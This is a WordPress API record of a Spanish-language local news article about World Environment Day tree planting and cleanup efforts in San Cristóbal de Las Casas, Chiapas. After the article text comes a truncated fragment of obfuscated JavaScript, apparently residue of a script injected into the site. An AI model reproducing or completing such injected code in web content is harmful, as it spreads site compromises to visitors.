{"id":15945,"date":"2024-06-05T23:52:35","date_gmt":"2024-06-05T23:52:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15945"},"modified":"2024-06-05T23:52:36","modified_gmt":"2024-06-05T23:52:36","slug":"realizan-iniciativas-para-concientizar-sobre-el-medio-ambiente-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15945","title":{"rendered":"Realizan iniciativas para concientizar sobre el Medio Ambiente en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"762\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240605-WA0019-762x1024.jpg\" alt=\"\" class=\"wp-image-15946\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240605-WA0019-762x1024.jpg 762w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240605-WA0019-223x300.jpg 223w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240605-WA0019-768x1032.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240605-WA0019.jpg 970w\" sizes=\"auto, (max-width: 762px) 100vw, 762px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>5 de junio del 2024. San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del D\u00eda Mundial del Medio Ambiente, activistas y ambientalistas de esta ciudad han organizado una serie de actividades con el objetivo de sensibilizar a la poblaci\u00f3n sobre la importancia de respetar y preservar los diversos ecosistemas de la regi\u00f3n.<\/p>\n\n\n\n<p>Las actividades del d\u00eda incluyen la restauraci\u00f3n de los humedales, para lo cual se plantar\u00e1n alrededor de cinco mil \u00e1rboles end\u00e9micos. Los organizadores invitan a la sociedad a sumarse a estas acciones y contribuir a devolver algo a la tierra.<\/p>\n\n\n\n<p>\u201cAfortunadamente, ya tenemos cinco mil \u00e1rboles para sembrar en la zona de los humedales\u201d, coment\u00f3 Nicol\u00e1s Tolentino G\u00f3mez Velasco, activista e integrante de la Coordinadora del Consejo General de la zona Sur.<\/p>\n\n\n\n<p>En entrevista, expres\u00f3 que las actividades comenzar\u00e1n temprano en los humedales de La Kisst y Mar\u00eda Eugenia, e hizo un llamado a la comunidad para unirse a los esfuerzos de restauraci\u00f3n del medio ambiente en San Crist\u00f3bal.<\/p>\n\n\n\n<p>Asimismo, resalt\u00f3 la gravedad del cambio clim\u00e1tico en la cuenca del Valle de Jovel, subrayando que los efectos ya son palpables para la poblaci\u00f3n. Seg\u00fan el activista, la ola de calor que afecta a la regi\u00f3n se debe en gran medida a la destrucci\u00f3n de los bosques de niebla, as\u00ed como a la deforestaci\u00f3n y la extracci\u00f3n de materiales como arena y grava. \u201cLa misma gente est\u00e1 destruyendo el medio ambiente\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s de la plantaci\u00f3n de \u00e1rboles, la jornada incluir\u00e1 actividades de recolecci\u00f3n de residuos para evitar la contaminaci\u00f3n ambiental. Los organizadores esperan que estas iniciativas no solo contribuyan a la restauraci\u00f3n ecol\u00f3gica, sino tambi\u00e9n a generar una mayor conciencia sobre la importancia de cuidar el medio ambiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 5 de junio del 2024. San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del D\u00eda Mundial del Medio Ambiente, activistas y ambientalistas de esta ciudad han organizado una serie de actividades con el objetivo de sensibilizar a la poblaci\u00f3n sobre la importancia de respetar y preservar los diversos ecosistemas de la regi\u00f3n. Las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15946,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15945","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15945"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15945\/revisions"}],"predecessor-version":[{"id":15947,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15945\/revisions\/15947"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15946"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}